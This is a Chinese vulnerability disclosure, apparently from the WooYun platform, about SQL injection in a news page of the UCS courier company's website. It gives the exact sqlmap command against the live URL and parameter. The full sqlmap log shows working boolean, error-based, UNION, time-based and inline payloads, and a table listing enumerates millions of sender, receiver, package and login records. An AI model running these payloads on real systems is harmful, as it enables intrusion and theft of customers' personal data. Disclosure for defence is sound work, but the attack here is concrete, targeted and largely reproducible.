漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:UCS官网SQL注入可导致3000w快递单信息泄露
提交时间:2015-10-04 18:08
修复时间:2015-11-18 18:10
公开时间:2015-11-18 18:10
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情 披露状态:
2015-10-04: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-18: 厂商已经主动忽略漏洞,细节向公众公开
简要描述: UCS一个知名快递厂商 朋友买东西用了他家的快递 顺手测试下 Currently, we can ship from the following countries to China, Hong Kong, and Taiwan: · United States (CA, NY, DE) · Amsterdam, Netherland · France · Germany · Japan · London, England · Melbourne/Sydney, Australia · Vancouver, Canada · Vienna, Austria
详细说明: 注入点: python sqlmap.py -u "http://www.ucsus.com/News.asp?Method=View&NewsID=170" 【sqlmap截图】:
【数据库截图】: 数据量已在图中标出
| dbo.UCS_PackageStatusLOG | 33814513 包裹状态 | dbo.UCS_SenderAddress | 3980814 | | dbo.UCS_ReceiveAddress | 3959837 | 收发地址 |“dbo.UCS_ReceivePackage_History | 1948694 | | dbo.UCS_ReceivePackage_History | 1948694 | 历史记录 【数据库信息】:
Database: UCS +----------------------------------------+---------+ | Table | Entries | +----------------------------------------+---------+ | dbo.UCS_PackageStatusLOG | 33814513 | dbo.UCS_NEWPODItemAPI | 10928805 | dbo.UCS_NEWPODItemAPI | 10928805 | dbo.UCS_TransitStatus_History | 9320179 | | dbo.UCS_TransitStatus_History | 9320179 | | dbo.UCS_ShipmentItem_History | 4105276 | | dbo.UCS_ShipmentItem_History | 4105276 | | dbo.UCS_SenderAddress | 3980814 | | dbo.UCS_ReceiveAddress | 3959837 | | dbo.aaa | 3055047 | | dbo.UCS_TrackingConfirm_20150729 | 2659181 | | dbo.UCS_TrackingConfirm_20150729 | 2659181 | | dbo.UCS_NEWPODAPI | 2221796 | | dbo.UCS_NEWPODAPI | 2221796 | | dbo.UCS_TrackingConfirmLog | 2162962 | | dbo.UCS_Transit | 1975173 | | dbo.UCS_ReceivePackage_History | 1948694 | | dbo.UCS_ReceivePackage_History | 1948694 | | dbo.UCS_EDILog | 1661784 | | dbo.UCS_BillRece | 1643932 | | dbo.UCS_PackageStatus_20150415 | 1596090 | | dbo.UCS_PackageStatus_20150415 | 1596090 | | dbo.UCS_Billinfo | 1405279 | | dbo.UCS_Billinfo | 1405279 | | dbo.UCS_PackingListCompare | 1130855 | | dbo.UCS_PackingListCompare | 1130855 | | dbo.查询 | 10747 | dbo.Sync_Old2New_TrackInf | 964505 | | dbo.Sync_Old2New_StationUserID | 959997 | | dbo.Sync_Old2New_TrackConfirm | 952638 | | dbo.Sync_Old2New_Track_PPLNO | 941882 | | dbo.Sync_Old2New_TrackWt_PP | 941878 | | dbo.Sync_Old2New_TrackWt_PP | 941878 | | dbo.UCS_ZipArea | 868624 | | dbo.UCS_Iherb_Confirm | 853216 | | dbo.UCS_Shipment_History | 848590 | | dbo.UCS_Shipment_History | 848590 | | dbo.UCS_Package_History | 848543 | | dbo.UCS_Package_History | 848543 | | dbo.UCS_Envelope | 760646 | | dbo.UCS_ExportInsurance | 646146 | | dbo.UCS_ExportInsuranceRemark | 645138 | | dbo.UCS_LoginLog | 382674 | | dbo.UCS_LoginLog | 382674 | | dbo.Ucs_HpodData | 327163 | | dbo.UCS_EmsReturnInfo | 319883 | | dbo.Ucs_ManifestUploadLog | 281685 | | dbo.UCS_FreeTrackNumber | 246017 | | dbo.UCS_ChangeTrackingBounding | 243301 | | dbo.Warehouse_TransitLog | 233017 | | dbo.UCS_Remark | 221049 | | dbo.UCS_StationLOG | 189513 | | dbo.UCS_TaxPackage | 187064 | | dbo.UCS_TrackIndex | 185258 | | dbo.UCS_TrackNumberTJHistory | 177458 | | dbo.UCS_TrackNumberTJHistory | 177458 | | dbo.Ucs_SchedulePickupConfirm | 167221 | | dbo.Ucs_SchedulePickupConfirm | 167221 | | dbo.UCS_BillInvoice | 164094 | | dbo.UCS_ThirdPartyAddress | 152544 | | dbo.UCS_PackingListConfirm | 132109 | | dbo.UCS_UserGroup | 131102 | | dbo.UCS_UserGroup | 131102 | | dbo.UCS_PackageStatusTemp1 | 117673 | | dbo.yao | 106630 | | dbo.UCS_ReceivePackageBindInvoiceNote | 102036 | | dbo.UCS_BillInvoiceStatus | 96975 | | dbo.CallCenter_DutyDate | 87974 | | dbo.UCS_BillOtherFee | 87200 | | dbo.UCS_PackingListWorkTime | 87189 | | dbo.UCS_BillSS | 79392 | | dbo.UCS_BillHistory | 77211 | | dbo.UCS_ZIPCodeUS | 76109 | | dbo.SyncTrackNumber | 64450 | | dbo.CallCenter_TSS | 55384 | | dbo.shaozhongl | 52138 | | dbo.steven13you | 52138 | | dbo.UCS_AddressBook | 43320 | | dbo.UCS_ZIPCodeCN | 40620 | | dbo.Warehouse_SubPackage | 40354 | | dbo.UCS_InvoiceNote | 39302 | | dbo.CallCenter_CustomsCheck | 33328 | | dbo.Warehouse_ProductItem | 31363 | | dbo.Warehouse_ProductItem | 31363 | | dbo.Warehouse_Package | 30432 | | dbo.UCS_BatchImport | 23469 | | dbo.UCS_PrePaidPackage | 19154 | | dbo.Sync_Old2New_HpodTrackEvent | 16711 | | dbo.UCS_NoAuthenticateTrackNumber | 16627 | | dbo.UCS_Account | 16467 | | dbo.YouJia201404 | 15345 | | dbo.YouJia201404 | 15345 | | dbo.YouJia201405 | 14897 | | dbo.Sync_Old2New_HpodTrackElhkTag | 14182 | | dbo.UCS_IsElHkTrack | 14176 | | dbo.YouJia201406 | 13203 | | dbo.UCS_EmsGroup | 12525 | | dbo.UCS_ReceiveGroup | 11984 | | dbo.UCS_DriverWorkTime | 11033 | | dbo.UCS_BillTemp | 9303 | | dbo.ucs_packagesyncstatus | 9123 | | dbo.PackageBatchImport | 9100 | | dbo.UCS_MessageOK | 7918 | | dbo.UCS_MessageOK | 7918 | | dbo.UCS_MainInvoice | 6928 | | dbo.Steven_shuijin07 | 6633 | | dbo.YouJia201407 | 6203 | | dbo.UCS_TransportOilWear | 5546 | | dbo.GuestBook | 5542 | | dbo.UCS_AwbNumber | 5368 | | dbo.TrackNumber_20130129 | 5356 | | dbo.UCS_AWBHouse | 5125 | | dbo.tracknumbersuijin | 5099 | | dbo.TrackNumber_FZ | 5000 | | dbo.UCS_ReturnPackage | 4908 | | dbo.Sheet1$ | 4639 | | dbo.UCS_ShippingMark | 4504 | | dbo.bushuju2012110702 | 4486 | | dbo.bushuju2012110701 | 4482 | | dbo.UCS_ManifestStatusLog | 3753 | | dbo.UCS_ManifestStatusLog | 3753 | | dbo.UCS_MGroup | 3669 | | dbo.UCS_CheckPrint | 2659 | | dbo.UCS_ManifestBind | 1945 | | dbo.UCS_QuanShunLog | 1911 | | dbo.UCS_PickupQueue | 1784 | | dbo.UCS_TransportOiling | 1728 | | dbo.UCS_Email | 1669 | | dbo.UCS_HShipment | 1657 | | dbo.NonePhoneTrackNo | 1621 | | dbo.UCS_AwbNoManage | 1618 | | dbo.UCS_UPUCode | 1557 | | dbo.UCS_Currency | 1535 | | dbo.Warehouse_User | 1340 | | dbo.UCS_Iherb_Scan_Log | 1259 | | dbo.UCS_PartnerPackingListPaletCount | 1218 | | dbo.UCS_PartnerPackingListPaletCount | 1218 | | dbo.Warehouse_ProductOrderDetail | 1088 | | dbo.Warehouse_ProductOrderDetail | 1088 | | dbo.UCS_RateCheck | 1027 | | dbo.UCS_RateCheck | 1027 | | dbo.Sync_Old2New_UserInf | 810 | | dbo.UCS_TSAPass | 790 | | dbo.UCS_BatchArrival | 781 | | dbo.UCS_PartnerInvoiceGroup | 745 | | dbo.UCS_PartnerInvoiceGroup | 745 | | dbo.UCS_MultiplePOD | 740 | | dbo.UCS_ItemLimitBlack | 723 | | dbo.UCS_ItemLimitBlack | 723 | | dbo.UCS_ItemLimitBlack | 723 | | dbo.CallCenter_ReturnGroup | 657 | | dbo.TempReturnPackage130322 | 606 | | dbo.UCS_FreePackage | 589 | | dbo.UCS_TrackingNoManage | 526 | | dbo.UCS_Reason | 511 | | dbo.UCS_CustomsCode | 400 | | dbo.UCS_ZIPCodeTW | 387 | | dbo.UCS_TaxLog | 302 | | dbo.UCS_TaxLog | 302 | | dbo.UCS_PickupAddress | 254 | | dbo.UCS_AirFlight | 240 | | dbo.UCS_Performance | 217 | | dbo.UCS_Commission | 197 | | dbo.UCS_QuickPOD | 186 | | dbo.UCS_StationContact | 179 | | dbo.UCS_ChangeTypeConfig | 160 | | dbo.UCS_IPLicence | 157 | | dbo.UCS_HpodInsError | 142 | | dbo.UCS_EDIErrorCode | 100 | | dbo.UCS_Staff | 93 | | dbo.UCS_News | 89 | | dbo.SYNC_MYSQL | 85 | | dbo.UCS_AwbAddress | 60 | | dbo.UCS_AwbAddress | 60 | | dbo.cs131101 | 59 | | dbo.UCS_PartnerContact | 41 | | dbo.UCS_PartnerContact | 41 | | dbo.Warehouse_Location | 36 | | dbo.UCS_CustomerNeeds | 35 | | dbo.UCS_CustomerNeeds | 35 | | dbo.UCS_InvoiceItemClass2 | 35 | | dbo.UCS_TransportCar | 33 | | dbo.UCS_CustomsUnit | 32 | | dbo.Sync_Old2New_TrackElhk | 31 | | dbo.UCS_Airport | 31 | | dbo.Warehouse_ServiceFee | 31 | | dbo.UCS_EDIDispatch | 28 | | dbo.UCS_Help | 27 | | dbo.UCS_BEEvent | 23 | | dbo.UCS_EDIState | 22 | | dbo.CallCenter_TrackPackage | 19 | | dbo.UCS_AirLine | 19 | | dbo.UCS_ZIPCodeHK | 18 | | dbo.UCS_PartnerPackingStatusNotify_EMI | 17 | | dbo.UCS_PartnerPackingStatusNotify_EMI | 17 | | dbo.UCS_AccountType | 15 | | dbo.UCS_BillStatement | 13 | | dbo.UCS_PaymentType | 13 | | dbo.UCS_Surcharge | 13 | | dbo.UCS_InsuranceCommission | 11 | | dbo.UCS_InsuranceCommission | 11 | | dbo.UCS_InvoiceItemClass3 | 11 | | dbo.UCS_RmSmallClass | 11 | | dbo.Warehouse_Express | 11 | | dbo.UCS_Country | 10 | | dbo.UCS_CreditCard | 10 | | dbo.UCS_PickupLocation | 10 | | dbo.UCS_Type | 7 | | dbo.UCS_KnowShipperAddress | 5 | | dbo.UCS_Refund | 5 | | dbo.UCS_StationInventoryGroup | 5 | | dbo.UCS_StationInventoryGroup | 5 | | dbo.CallCenter_DutyCustomsCode | 4 | | dbo.CallCenter_DutyCustomsCode | 4 | | dbo.UCS_Area | 4 | | dbo.UCS_StationArea | 4 | | dbo.UCS_StationArea | 4 | | dbo.Warehouse_Shelf | 4 | | dbo.UCS_BillInPayFee | 3 | | dbo.UCS_InsuranceCurrency | 3 | | dbo.UCS_RmBigClass | 3 | | dbo.UCS_SubInvoiceNote | 3 | | dbo.Warehouse_Name | 3 | | dbo.CallCenter_OtherFee | 2 | | dbo.UCS_AwbRateAdjust | 2 | | dbo.UCS_AwbRateAdjust | 2 | | dbo.UCS_InvoiceItemClass1 | 2 | | dbo.Warehouse_BigClass | 2 | | dbo.Warehouse_SmallClass | 2 | | dbo.CallCenter_LockGoodsGroup | 1 | | dbo.CallCenter_LockGoodsGroup | 1 | | dbo.UCS_Location | 1 | | dbo.UCS_Setup | 1 |
漏洞证明: 【sqlmap全过程】
[17:15:19] [INFO] testing connection to the target URL [17:15:27] [INFO] testing if the target URL is stable. This can take a couple of seconds [17:15:29] [INFO] target URL is stable [17:15:30] [INFO] heuristics detected web page charset 'ascii' [17:15:30] [INFO] heuristic (basic) test shows that GET parameter 'NewsID' might be injectable (possible DBMS: 'Microsoft SQL Server') [17:15:31] [INFO] testing for SQL injection on GET parameter 'NewsID' heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL S erver'. Do you want to skip test payloads specific for other DBMSes? [Y/n] do you want to include all tests for 'Microsoft SQL Server' extending provided l evel (1) and risk (1) values? [Y/n] [17:16:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [17:16:08] [INFO] GET parameter 'NewsID' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable [17:16:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [17:16:08] [INFO] GET parameter 'NewsID' is 'Microsoft SQL Server/Sybase AND err or-based - WHERE or HAVING clause' injectable [17:16:08] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [17:16:09] [INFO] GET parameter 'NewsID' is 'Microsoft SQL Server/Sybase inline queries' injectable [17:16:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [17:16:09] [WARNING] time-based comparison requires larger statistical model, pl ease wait.................... [17:16:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [17:16:28] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea vy query)' [17:16:34] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea vy query - comment)' [17:16:38] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav y query)' [17:17:39] [INFO] GET parameter 'NewsID' seems to be 'Microsoft SQL Server/Sybas e OR time-based blind (heavy query)' injectable [17:17:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [17:17:39] [INFO] automatically extending ranges for UNION query injection techn ique tests as there is at least one other (potential) technique found [17:17:41] [WARNING] reflective value(s) found and filtering out [17:17:41] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending t he range for current UNION query injection technique test [17:17:44] [INFO] target URL appears to have 8 columns in query [17:17:55] [INFO] GET parameter 'NewsID' is 'Generic UNION query (NULL) - 1 to 2 0 columns' injectable GET parameter 'NewsID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 53 HTTP(s) requ ests: --- Parameter: NewsID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Method=View&NewsID=170 AND 2212=2212 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Method=View&NewsID=170 AND 3021=CONVERT(INT,(SELECT CHAR(113)+CHAR( 113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3021=3021) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: Method=View&NewsID=-4728 UNION ALL SELECT NULL,CHAR(113)+CHAR(113)+ CHAR(112)+CHAR(107)+CHAR(113)+CHAR(109)+CHAR(97)+CHAR(117)+CHAR(72)+CHAR(102)+CH AR(85)+CHAR(87)+CHAR(71)+CHAR(116)+CHAR(109)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(1 12)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: Method=View&NewsID=-9061 OR 6159=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysuser s AS sys6,sysusers AS sys7) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: Method=View&NewsID=(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+ CHAR(113)+(SELECT (CASE WHEN (3277=3277) THEN CHAR(49) ELSE CHAR(48) END))+CHAR( 113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)) --- [17:18:30] [INFO] testing Microsoft SQL Server [17:18:31] [INFO] confirming Microsoft SQL Server [17:18:37] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 R2 or 7 web application technology: Microsoft IIS 7.5, ASP.NET, ASP back-end DBMS: Microsoft SQL Server 2008
修复方案: 版权声明:转载请注明来源 路人甲 @乌云
漏洞回应 厂商回应: 未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)